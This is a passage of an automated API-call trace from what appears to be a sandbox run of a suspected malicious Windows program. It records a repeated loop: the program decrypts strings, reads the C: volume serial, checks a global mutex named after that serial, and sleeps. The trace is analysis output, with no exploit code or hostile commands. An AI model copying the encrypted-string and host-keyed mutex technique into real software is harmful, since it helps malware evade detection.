lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0189.083] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0189.083] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0189.083] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0189.083] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0189.083] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0189.083] CryptDestroyKey (hKey=0x29c020) returned 1 [0189.083] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0189.083] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0189.083] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0189.083] CloseHandle (hObject=0x210) returned 1 [0189.083] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0189.083] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0189.083] Sleep (dwMilliseconds=0x3e8) [0190.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0190.094] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0190.094] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0190.094] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0190.094] CryptDestroyKey (hKey=0x29c020) returned 1 [0190.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0190.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0190.094] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0190.094] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0190.094] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0190.094] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0190.094] CryptDestroyKey (hKey=0x29c020) returned 1 [0190.094] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0190.094] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0190.094] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0190.094] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0190.094] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0190.095] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0190.095] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0190.095] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0190.095] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0190.095] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0190.095] CryptDestroyKey (hKey=0x29c020) returned 1 [0190.095] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0190.095] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0190.095] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0190.095] CloseHandle (hObject=0x210) returned 1 [0190.095] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0190.095] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0190.095] Sleep (dwMilliseconds=0x3e8) [0191.480] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0191.480] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0191.480] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0191.480] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0191.480] CryptDestroyKey (hKey=0x29c020) returned 1 [0191.480] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0191.480] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0191.480] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0191.480] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0191.480] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0191.480] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0191.480] CryptDestroyKey (hKey=0x29c020) returned 1 [0191.480] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0191.480] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0191.480] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0191.480] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0191.480] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0191.481] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0191.481] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0191.481] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0191.481] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0191.481] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0191.481] CryptDestroyKey (hKey=0x29c020) returned 1 [0191.481] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0191.481] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x210 [0191.481] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x0) returned 0x102 [0191.481] CloseHandle (hObject=0x210) returned 1 [0191.481] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0191.481] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0191.481] Sleep (dwMilliseconds=0x3e8) [0192.673] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0192.683] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0192.683] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0192.683] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0192.684] CryptDestroyKey (hKey=0x29c020) returned 1 [0192.684] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0192.684] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9690 [0192.684] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0192.684] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0192.684] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0192.684] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0192.684] CryptDestroyKey (hKey=0x29c020) returned 1 [0192.684] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0192.684] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0192.684] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0192.684] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0192.684] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0192.684] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0192.684] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x310ff80 [0192.684] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0192.684] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0192.684] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x310ff80, pdwDataLen=0x200fb28 | out: pbData=0x310ff80, pdwDataLen=0x200fb28) returned 1 [0192.684] CryptDestroyKey (hKey=0x29c020) returned 1 [0192.684] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0192.684] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x214 [0192.684] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x0) returned 0x102 [0192.684] CloseHandle (hObject=0x214) returned 1 [0192.684] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x310ff80 | out: hHeap=0x1db0000) returned 1 [0192.684] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0192.684] Sleep (dwMilliseconds=0x3e8) [0193.755] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0193.755] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0193.755] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0193.755] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0193.755] CryptDestroyKey (hKey=0x29c020) returned 1 [0193.755] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0193.755] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0193.755] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0193.755] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0193.756] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0193.756] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0193.756] CryptDestroyKey (hKey=0x29c020) returned 1 [0193.756] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0193.756] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0193.756] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0193.756] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0193.756] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0193.756] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0193.756] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0193.756] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0193.756] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0193.756] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0193.756] CryptDestroyKey (hKey=0x29c020) returned 1 [0193.756] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0193.756] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0193.756] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0193.756] CloseHandle (hObject=0x1c0) returned 1 [0193.756] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0193.756] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0193.756] Sleep (dwMilliseconds=0x3e8) [0194.769] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0194.769] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0194.769] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0194.769] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0194.769] CryptDestroyKey (hKey=0x29c020) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0194.769] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0194.769] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0194.769] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0194.769] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0194.769] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0194.769] CryptDestroyKey (hKey=0x29c020) returned 1 [0194.769] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0194.769] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0194.769] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0194.769] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0194.769] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0194.769] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0194.769] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0194.769] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0194.769] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0194.769] CryptDestroyKey (hKey=0x29c020) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0194.769] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0194.769] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0194.769] CloseHandle (hObject=0x1c0) returned 1 [0194.770] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0194.770] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0194.770] Sleep (dwMilliseconds=0x3e8) [0195.963] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0195.963] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0195.963] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0195.963] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0195.963] CryptDestroyKey (hKey=0x29c020) returned 1 [0195.963] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0195.963] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0195.964] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0195.964] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0195.964] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0195.964] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0195.964] CryptDestroyKey (hKey=0x29c020) returned 1 [0195.964] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0195.964] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0195.964] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0195.964] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0195.964] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0195.964] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0195.964] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0195.964] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0195.964] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0195.964] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0195.964] CryptDestroyKey (hKey=0x29c020) returned 1 [0195.964] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0195.964] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0195.964] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0195.964] CloseHandle (hObject=0x1c0) returned 1 [0195.964] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0195.964] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0195.964] Sleep (dwMilliseconds=0x3e8) [0197.072] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0197.072] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0197.072] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0197.072] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0197.072] CryptDestroyKey (hKey=0x29c020) returned 1 [0197.072] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0197.072] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0197.072] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0197.072] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0197.072] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0197.073] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0197.073] CryptDestroyKey (hKey=0x29c020) returned 1 [0197.073] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0197.073] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0197.073] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0197.073] HeapFree (in: 